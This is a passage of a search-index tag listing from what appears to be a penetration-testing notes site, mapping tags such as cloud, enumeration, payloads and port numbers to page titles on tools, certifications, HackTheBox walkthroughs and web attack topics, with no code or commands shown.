                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#bypass-techniques","title":"bypass techniques","text":"
                                            • Virtualbox and Extension Pack
                                            ","tags":["tags"]},{"location":"tags/#bypassing-firewall","title":"bypassing firewall","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#bypassing-techniques","title":"bypassing techniques","text":"
                                            • Bypassing Next Generation Firewalls
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            ","tags":["tags"]},{"location":"tags/#certification","title":"certification","text":"
                                            • eWPT Preparation
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#cheat","title":"cheat","text":"
                                            • Pentesting Powerapp
                                            ","tags":["tags"]},{"location":"tags/#cheat-sheet","title":"cheat sheet","text":"
                                            • msSQL - Microsoft SQL Server
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • sqsh
                                            ","tags":["tags"]},{"location":"tags/#checklist","title":"checklist","text":"
                                            • Thick client Applications Pentesting Checklist
                                            ","tags":["tags"]},{"location":"tags/#checksum","title":"checksum","text":"
                                            • Checksum
                                            ","tags":["tags"]},{"location":"tags/#chrome","title":"chrome","text":"
                                            • Pentesting browsers
                                            ","tags":["tags"]},{"location":"tags/#cloud","title":"cloud","text":"
                                            • AWS cli
                                            • Azure-CLI
                                            • Azure Powershell
                                            • gcloud CLI
                                            • Apache CloudStack Essentials
                                            • Amazon Web Services (AWS) Essentials
                                            • Pentesting Amazon Web Services (AWS)
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            • Pentesting Azure
                                            • Pentesting docker
                                            • Google Cloud Platform Essentials
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#cloud-pentesting","title":"cloud pentesting","text":"
                                            • Pentesting cloud
                                            ","tags":["tags"]},{"location":"tags/#cms_1","title":"cms","text":"
                                            • moodlescan
                                            ","tags":["tags"]},{"location":"tags/#connection-problems","title":"connection problems","text":"
                                            • How to resolve run of the mill connection problems
                                            ","tags":["tags"]},{"location":"tags/#containers","title":"containers","text":"
                                            • Pentesting docker
                                            ","tags":["tags"]},{"location":"tags/#course","title":"course","text":"
                                            • eWPT Preparation
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#cpts_1","title":"cpts","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#cracking-tool","title":"cracking tool","text":"
                                            • Hashcat - A password recovery tool
                                            ","tags":["tags"]},{"location":"tags/#crytography","title":"crytography","text":"
                                            • cryptography
                                            ","tags":["tags"]},{"location":"tags/#cvss","title":"cvss","text":"
                                            • CVSS Common Vulnerability Scoring System
                                            • Microsoft DREAD
                                            ","tags":["tags"]},{"location":"tags/#cybersecurity","title":"cybersecurity","text":"
                                            • Welcome to Hacking Life!
                                            ","tags":["tags"]},{"location":"tags/#database","title":"database","text":"
                                            • MariaDB
                                            • Mongo
                                            • Mongo
                                            • msSQL - Microsoft SQL Server
                                            • MySQL
                                            • Pentesting Powerapp
                                            • sqlite
                                            • sqlite
                                            • sqsh
                                            • Virtual environments
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#ddns","title":"ddns","text":"
                                            • Coding a DDNS aware shell
                                            ","tags":["tags"]},{"location":"tags/#deserialization","title":"deserialization","text":"
                                            • Phpggc - A tool for PHP deserialization
                                            • Ysoserial - A tool for Java deserialization
                                            • BurpSuite Labs - Insecure deserialization
                                            ","tags":["tags"]},{"location":"tags/#dictionaries","title":"dictionaries","text":"
                                            • cewl - A custom dictionary generator
                                            • crunch - A dictionary generator
                                            ","tags":["tags"]},{"location":"tags/#dictionary","title":"dictionary","text":"
                                            • CUPP - Common User Password Profiler
                                            • Dictionaries or wordlists resources
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#dictionary-attack","title":"dictionary attack","text":"
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            ","tags":["tags"]},{"location":"tags/#dictionary-generator","title":"dictionary generator","text":"
                                            • CUPP - Common User Password Profiler
                                            ","tags":["tags"]},{"location":"tags/#directory","title":"directory","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#directory-enumeration","title":"directory enumeration","text":"
                                            • dirb - A web content enumeration tool
                                            ","tags":["tags"]},{"location":"tags/#django","title":"django","text":"
                                            • django pentesting
                                            ","tags":["tags"]},{"location":"tags/#dll-hickjacking","title":"dll hickjacking","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#dns","title":"dns","text":"
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • How to resolve run of the mill connection problems
                                            • nslookup
                                            ","tags":["tags"]},{"location":"tags/#dns-enumeration","title":"dns enumeration","text":"
                                            • Amass
                                            ","tags":["tags"]},{"location":"tags/#dnspy","title":"dnspy","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            • First challenge - Enabling a button - Thick client Applications
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#docker","title":"docker","text":"
                                            • docker
                                            • Pentesting docker
                                            ","tags":["tags"]},{"location":"tags/#domain","title":"domain","text":"
                                            • Port 53 - Domain Name Server (DNS)
                                            • ctr.sh
                                            • dnscan - A DNS subdomain scanner
                                            ","tags":["tags"]},{"location":"tags/#dorking","title":"dorking","text":"
                                            • Github dorks
                                            • Google dorks
                                            ","tags":["tags"]},{"location":"tags/#dorkings","title":"dorkings","text":"
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#dotpeek","title":"dotpeek","text":"
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#dovecot","title":"dovecot","text":"
                                            • 55006-55007 Dovecot pop3
                                            ","tags":["tags"]},{"location":"tags/#dread","title":"dread","text":"
                                            • Microsoft DREAD
                                            ","tags":["tags"]},{"location":"tags/#dump-hashes","title":"dump hashes","text":"
                                            • CrackMapExec
                                            • Invoke-TheHash
                                            • mimikatz
                                            • pypykatz
                                            ","tags":["tags"]},{"location":"tags/#ewpt","title":"eWPT","text":"
                                            • 01. Information Gathering / Footprinting
                                            • Pentesting Notes
                                            ","tags":["tags"]},{"location":"tags/#echo-mirage","title":"echo mirage","text":"
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#encryption","title":"encryption","text":"
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            ","tags":["tags"]},{"location":"tags/#engagement","title":"engagement","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#enumeration","title":"enumeration","text":"
                                            • The ActiveDirectory PowerShell module
                                            • Amass
                                            • Aquatone - Automatize web scanner in large subdomain lists
                                            • BloodHound
                                            • braa - SNMP scanner
                                            • cewl - A custom dictionary generator
                                            • crunch - A dictionary generator
                                            • CUPP - Common User Password Profiler
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • enum
                                            • enum4linux
                                            • EyeWitness
                                            • ffuf - A fast web fuzzer written in Go
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • Hashcat - A password recovery tool
                                            • Bank - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            • httprint - A web server fingerprinting tool
                                            • JAWS - Just Another Windows (Enum) Script
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            • knockpy - A subdomain scanner
                                            • LinEnum - A tool to scan Linux system
                                            • nslookup
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • Seatbelt - A tool to scan Windows system
                                            • SharpView
                                            • snmpwalk - SNMP scanner
                                            • WafW00f - A firewall scanner
                                            • Weevely - A PHP webshell backdoor generator
                                            • whatweb - A web scanner
                                            • wpscan - Wordpress Security Scanner
                                            ","tags":["tags"]},{"location":"tags/#evading-detection","title":"evading detection","text":"
                                            • Evading detection in file transfers
                                            ","tags":["tags"]},{"location":"tags/#exploitation","title":"exploitation","text":"
                                            • searchsploit
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            • OWASP Web Security Testing Guide
                                            • Web Exploitation Guide
                                            ","tags":["tags"]},{"location":"tags/#file","title":"file","text":"
                                            • exiftool - A tool for metadata edition
                                            ","tags":["tags"]},{"location":"tags/#file-integrity","title":"file integrity","text":"
                                            • Checksum
                                            ","tags":["tags"]},{"location":"tags/#file-transfer","title":"file transfer","text":"
                                            • Setting up servers
                                            ","tags":["tags"]},{"location":"tags/#file-transfer-technique","title":"file transfer technique","text":"
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            • uploadserver
                                            ","tags":["tags"]},{"location":"tags/#file-upload","title":"file upload","text":"
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#fingerprinting","title":"fingerprinting","text":"
                                            • httprint - A web server fingerprinting tool
                                            ","tags":["tags"]},{"location":"tags/#firefox","title":"firefox","text":"
                                            • Pentesting browsers
                                            • Man in the browser attack
                                            ","tags":["tags"]},{"location":"tags/#firewall","title":"firewall","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#footprinting","title":"footprinting","text":"
                                            • 01. Information Gathering / Footprinting
                                            ","tags":["tags"]},{"location":"tags/#forensic","title":"forensic","text":"
                                            • Computer Forensic Fundamentals
                                            ","tags":["tags"]},{"location":"tags/#ftp","title":"ftp","text":"
                                            • 21 ftp
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            ","tags":["tags"]},{"location":"tags/#ftp-server","title":"ftp server","text":"
                                            • pyftpdlib - A ftp server written in python
                                            ","tags":["tags"]},{"location":"tags/#gcp","title":"gcp","text":"
                                            • gcloud CLI
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#google-cloud-platform","title":"google cloud platform","text":"
                                            • gcloud CLI
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#headers","title":"headers","text":"
                                            • CSRF attack - Cross Site Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#host-based-firewall","title":"host based firewall","text":"
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            ","tags":["tags"]},{"location":"tags/#http_1","title":"http","text":"
                                            • netcat
                                            ","tags":["tags"]},{"location":"tags/#idasm","title":"idasm","text":"
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#ilasm","title":"ilasm","text":"
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#ilspy","title":"ilspy","text":"
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#imap","title":"imap","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#impacket","title":"impacket","text":"
                                            • 1433 msSQL
                                            • smbserver - from impacket
                                            ","tags":["tags"]},{"location":"tags/#information-gathering","title":"information gathering","text":"
                                            • Information gathering
                                            ","tags":["tags"]},{"location":"tags/#information-gathering_1","title":"information-gathering","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#intelligent-platform-management-interface","title":"intelligent platform management interface","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            ","tags":["tags"]},{"location":"tags/#ipmi","title":"ipmi","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            • IPMItool
                                            ","tags":["tags"]},{"location":"tags/#ips","title":"ips","text":"
                                            • Bypassing IPS with handmade XOR Encryption
                                            ","tags":["tags"]},{"location":"tags/#java","title":"java","text":"
                                            • Log4j
                                            • Ysoserial - A tool for Java deserialization
                                            ","tags":["tags"]},{"location":"tags/#java-rmi","title":"java rmi","text":"
                                            • 1090 java rmi
                                            ","tags":["tags"]},{"location":"tags/#jboss","title":"jboss","text":"
                                            • 8080 JBoss AS Instance 6.1.0
                                            ","tags":["tags"]},{"location":"tags/#jndi","title":"jndi","text":"
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#jwt","title":"jwt","text":"
                                            • BurpSuite Labs - Json Web Token jwt
                                            • BurpSuite Labs - Json Web Token jwt
                                            • Json Web Token attacks
                                            ","tags":["tags"]},{"location":"tags/#keycloak","title":"keycloak","text":"
                                            • Pentesting Keycloak
                                            ","tags":["tags"]},{"location":"tags/#keylogger","title":"keylogger","text":"
                                            • Dumping saved passwords from Google Chrome
                                            • Hijacking Keepass Password Manager
                                            • Simple keylogger in python
                                            ","tags":["tags"]},{"location":"tags/#labs","title":"labs","text":"
                                            • Basic Lab Setup - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#language","title":"language","text":"
                                            • Markdown
                                            ","tags":["tags"]},{"location":"tags/#ldap","title":"ldap","text":"
                                            • Port 389 - 636 LDAP
                                            • Active Directory - LDAP
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
                                            • Microsoft Management Console (MMC)
                                            • NT Authority System
                                            • PowerUp.ps1
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • SharpView
                                            ","tags":["tags"]},{"location":"tags/#linux","title":"linux","text":"
                                            • Arp poisoning
                                            • Configuration files
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • Dirty COW (Copy On Write)
                                            • Kernel vulnerability exploitation
                                            • Linux credentials storage
                                            • lxd
                                            • postfix - A SMTP server
                                            • Process capabilities - getcap
                                            • SSH keys
                                            • Suid Binaries
                                            • Transferring files techniques - Linux
                                            ","tags":["tags"]},{"location":"tags/#linux-pentesting","title":"linux pentesting","text":"
                                            • LinEnum - A tool to scan Linux system
                                            • linPEAS - A tool to scan Linux system
                                            • Linux Privilege Checker
                                            ","tags":["tags"]},{"location":"tags/#linux-privilege-escalation","title":"linux privilege escalation","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#local-file-inclusion","title":"local file inclusion","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#log4j","title":"log4j","text":"
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#lxd","title":"lxd","text":"
                                            • lxd
                                            ","tags":["tags"]},{"location":"tags/#lxd-exploitation","title":"lxd exploitation","text":"
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#mariadb","title":"mariadb","text":"
                                            • 3306 mariadb mysql
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#metasploit","title":"metasploit","text":"
                                            • Lame - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#microsoft","title":"microsoft","text":"
                                            • Exams - Practice the AZ-500
                                            • Exams - Practice the AZ-900
                                            ","tags":["tags"]},{"location":"tags/#mimikatz","title":"mimikatz","text":"
                                            • 3389 RDP
                                            ","tags":["tags"]},{"location":"tags/#mitm-relay","title":"mitm relay","text":"
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#mobile-pentesting","title":"mobile pentesting","text":"
                                            • Android Debug Bridge - ADB
                                            • apktool
                                            • drozer - A security testing framework for Android
                                            • Frida - A dynamic instrumentation toolkit
                                            • Mobile Security Framework - MobSF
                                            • Objection
                                            • scrcpy
                                            • Setting up the mobile pentesting environment
                                            ","tags":["tags"]},{"location":"tags/#mongodb","title":"mongodb","text":"
                                            • 27017-27018 mongodb
                                            • Walkthough - A HackTheBox machine - Mongod
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#moodle","title":"moodle","text":"
                                            • moodlescan
                                            ","tags":["tags"]},{"location":"tags/#mssql","title":"mssql","text":"
                                            • 1433 msSQL
                                            • sqsh
                                            ","tags":["tags"]},{"location":"tags/#mysql","title":"mysql","text":"
                                            • 3306 mariadb mysql
                                            ","tags":["tags"]},{"location":"tags/#nessus","title":"nessus","text":"
                                            • Vulnerability assessment
                                            ","tags":["tags"]},{"location":"tags/#network","title":"network","text":"
                                            • Network traffic capture tools
                                            • vnstat - Monitoring network impact
                                            ","tags":["tags"]},{"location":"tags/#network-services","title":"network services","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#next-generation-firewalls","title":"next generation firewalls","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#nmap","title":"nmap","text":"
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#odata","title":"oData","text":"
                                            • Pentesting oDAta
                                            ","tags":["tags"]},{"location":"tags/#of","title":"of","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#open-source","title":"open source","text":"
                                            • Apache CloudStack Essentials
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#openssl","title":"openssl","text":"
                                            • openSSL - Cryptography and SSL/TLS Toolkit
                                            ","tags":["tags"]},{"location":"tags/#openvas","title":"openvas","text":"
                                            • Vulnerability assessment
                                            ","tags":["tags"]},{"location":"tags/#oracle-tns","title":"oracle tns","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • sqlplus - To connect and manage the Oracle RDBMS
                                            ","tags":["tags"]},{"location":"tags/#osint","title":"osint","text":"
                                            • Github dorks
                                            • Google dorks
                                            ","tags":["tags"]},{"location":"tags/#package-manager","title":"package manager","text":"
                                            • pip
                                            ","tags":["tags"]},{"location":"tags/#pass-the-hash-attack","title":"pass the hash attack","text":"
                                            • Invoke-TheHash
                                            • mimikatz
                                            ","tags":["tags"]},{"location":"tags/#pass-the-hash","title":"pass-the-hash","text":"
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#passive-reconnaissance","title":"passive reconnaissance","text":"
                                            • p0f
                                            ","tags":["tags"]},{"location":"tags/#passiverecon","title":"passiverecon","text":"
                                            • HTTrack - A tool for mirrowing sites
                                            • nmap - A network exploration and security auditing tool
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            ","tags":["tags"]},{"location":"tags/#password-cracker","title":"password cracker","text":"
                                            • ophcrack - A windows password cracker based on rainbow tables
                                            ","tags":["tags"]},{"location":"tags/#passwords","title":"passwords","text":"
                                            • CrackMapExec
                                            • hydra
                                            • Invoke-TheHash
                                            • Lazagne
                                            • medusa
                                            • mimikatz
                                            • pypykatz
                                            ","tags":["tags"]},{"location":"tags/#payloads","title":"payloads","text":"
                                            • darkarmour
                                            • mythic
                                            • nishang
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#pentest","title":"pentest","text":"
                                            • Information gathering
                                            ","tags":["tags"]},{"location":"tags/#pentesting","title":"pentesting","text":"
                                            • Welcome to Hacking Life!
                                            • 22 ssh
                                            • 3128 squid
                                            • Port 53 - Domain Name Server (DNS)
                                            • 69 - tftp
                                            • Aquatone - Automatize web scanner in large subdomain lists
                                            • Bind Shells
                                            • Pentesting browsers
                                            • Configuration files
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • curl
                                            • dig axfr
                                            • dirb - A web content enumeration tool
                                            • Dirty COW (Copy On Write)
                                            • django pentesting
                                            • dnscan - A DNS subdomain scanner
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSpy - A .NET decompiler for windows
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • eJPT - eLearnSecurity Junior Penetration Tester
                                            • exiftool - A tool for metadata edition
                                            • EyeWitness
                                            • feroxbuster - A web content enumeration tool for not referenced resources
                                            • ffuf - A fast web fuzzer written in Go
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • Gopherus
                                            • Gopherus
                                            • grep
                                            • Hashcat - A password recovery tool
                                            • httprint - A web server fingerprinting tool
                                            • hydra
                                            • ntlmrelayx - a module from Impacket
                                            • PsExec - a module from Impacket
                                            • SMBExec - a module from Impacket
                                            • Impacket - A python tool for network protocols
                                            • IPMItool
                                            • JAWS - Just Another Windows (Enum) Script
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            • Kernel vulnerability exploitation
                                            • knockpy - A subdomain scanner
                                            • Lateral movements
                                            • Laudanum - Injectable Web Exploit Code
                                            • Lazagne
                                            • LinEnum - A tool to scan Linux system
                                            • linPEAS - A tool to scan Linux system
                                            • Linux exploit suggester
                                            • Linux Privilege Checker
                                            • LOLbins - Living off the land binaries - LOLbas and GTFObins
                                            • M365 CLI
                                            • medusa
                                            • metasploit
                                            • moodlescan
                                            • msfvenom
                                            • Pentesting MyBB
                                            • netcraft
                                            • netdiscover - A network enumeration tool based on ARP request
                                            • Network traffic capture tools
                                            • noip
                                            • nslookup
                                            • Pentesting oDAta
                                            • ophcrack - A windows password cracker based on rainbow tables
                                            • Pentesting Notes
                                            • pyftpdlib - A ftp server written in python
                                            • pyinstaller
                                            • Reverse Shells
                                            • Reverse Shells
                                            • Samba Suite
                                            • searchsploit
                                            • Seatbelt - A tool to scan Windows system
                                            • Spawn a shell
                                            • SQLi Cheat sheet for manual injection
                                            • sqlmap - A tool for testing SQL injection
                                            • SSH keys
                                            • sslyze - A tool for scanning certificates
                                            • sublist3r - A subdomain enumerating tool
                                            • Suid Binaries
                                            • tcpdump - A command-line packet analyzer
                                            • The Harvester - A tool for pasive and active reconnaissance
                                            • Tmux - A terminal multiplexer
                                            • veil - A backdoor generator
                                            • Vulnerability assessment
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • w3af
                                            • WafW00f - A firewall scanner
                                            • waybackurls
                                            • Pentesting web services
                                            • Web Shells
                                            • WebDav- WsgiDAV - A generic and extendable WebDAV server
                                            • Weevely - A PHP webshell backdoor generator
                                            • wfuzz
                                            • whatweb - A web scanner
                                            • Window Detective - A tool to view windows properties in the system
                                            • Windows binaries - LOLBAS
                                            • winspy - A tool to view windows properties in the system
                                            • pentesting wordpress
                                            • wpscan - Wordpress Security Scanner
                                            • xsltproc
                                            • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                            • OWASP Web Security Testing Guide
                                            • OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            • Mifare Classic
                                            • Mifare Desfire
                                            • NFC - Setting up proxmark3 RDV4.01
                                            • Proxmark3 RDV4.01
                                            • Proxmark3 RDV4.01
                                            • RFID
                                            • Web Exploitation Guide
                                            • Web Exploitation Guide
                                            • Arbitrary file upload
                                            • Arbitrary file upload
                                            • CSRF attack - Cross Site Request Forgery
                                            • Directory Traversal attack
                                            • Insecure deserialization
                                            • Json Web Token attacks
                                            • LFI attack - Local File Inclusion
                                            • NoSQL injection
                                            • NoSQL injection
                                            • RFD attack - Reflected File Download
                                            • RCE attack - Remote Code Execution
                                            • RFI attack - Remote File Inclusion
                                            • SSRF attack - Server Side Request Forgery
                                            • Server-side Template Injection - SSTI
                                            • Session Puzzling - Session Variable Overloading
                                            • SQL injection
                                            ","tags":["tags"]},{"location":"tags/#pentesting-http-headers","title":"pentesting HTTP headers","text":"
                                            • HTTP headers
                                            ","tags":["tags"]},{"location":"tags/#pentesting-cloud","title":"pentesting cloud","text":"
                                            • Pentesting Amazon Web Services (AWS)
                                            • Pentesting Azure
                                            ","tags":["tags"]},{"location":"tags/#pentesting-windows","title":"pentesting windows","text":"
                                            • SAMRDump
                                            • smbserver - from impacket
                                            • Windows Null session attack
                                            • Winfo
                                            ","tags":["tags"]},{"location":"tags/#pentestingc","title":"pentesting\u00e7","text":"
                                            • Weevely - A PHP webshell backdoor generator
                                            ","tags":["tags"]},{"location":"tags/#persistence","title":"persistence","text":"
                                            • Making your binary persistent
                                            ","tags":["tags"]},{"location":"tags/#phishing","title":"phishing","text":"
                                            • BeEF - The browser exploitation framework project
                                            • Tools for cloning a site
                                            ","tags":["tags"]},{"location":"tags/#php","title":"php","text":"
                                            • pentesmonkey php reverse shell
                                            • Phpggc - A tool for PHP deserialization
                                            • WhiteWinterWolf php webshell
                                            ","tags":["tags"]},{"location":"tags/#php-include","title":"php include","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#php-type-juggling","title":"php type juggling","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#ping","title":"ping","text":"
                                            • fping - An improved ping tool
                                            • How to resolve run of the mill connection problems
                                            ","tags":["tags"]},{"location":"tags/#pop3","title":"pop3","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port","title":"port","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#port-1090","title":"port 1090","text":"
                                            • 1090 java rmi
                                            ","tags":["tags"]},{"location":"tags/#port-110","title":"port 110","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-111","title":"port 111","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 2049 - NFS Network File System
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#port-137","title":"port 137","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-138","title":"port 138","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-139","title":"port 139","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-143","title":"port 143","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-1433","title":"port 1433","text":"
                                            • 1433 msSQL
                                            ","tags":["tags"]},{"location":"tags/#port-1521","title":"port 1521","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • sqlplus - To connect and manage the Oracle RDBMS
                                            ","tags":["tags"]},{"location":"tags/#port-161","title":"port 161","text":"
                                            • 161-162 SNMP Simple Network Management Protocol
                                            • braa - SNMP scanner
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • snmpwalk - SNMP scanner
                                            ","tags":["tags"]},{"location":"tags/#port-162","title":"port 162","text":"
                                            • 1521 - Oracle Transparent Network Substrate (TNS)
                                            • 161-162 SNMP Simple Network Management Protocol
                                            ","tags":["tags"]},{"location":"tags/#port-20","title":"port 20","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#port-2049","title":"port 2049","text":"
                                            • Port 2049 - NFS Network File System
                                            ","tags":["tags"]},{"location":"tags/#port-21","title":"port 21","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#port-22","title":"port 22","text":"
                                            • 22 ssh
                                            ","tags":["tags"]},{"location":"tags/#port-23","title":"port 23","text":"
                                            • 23 telnet
                                            ","tags":["tags"]},{"location":"tags/#port-25","title":"port 25","text":"
                                            • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
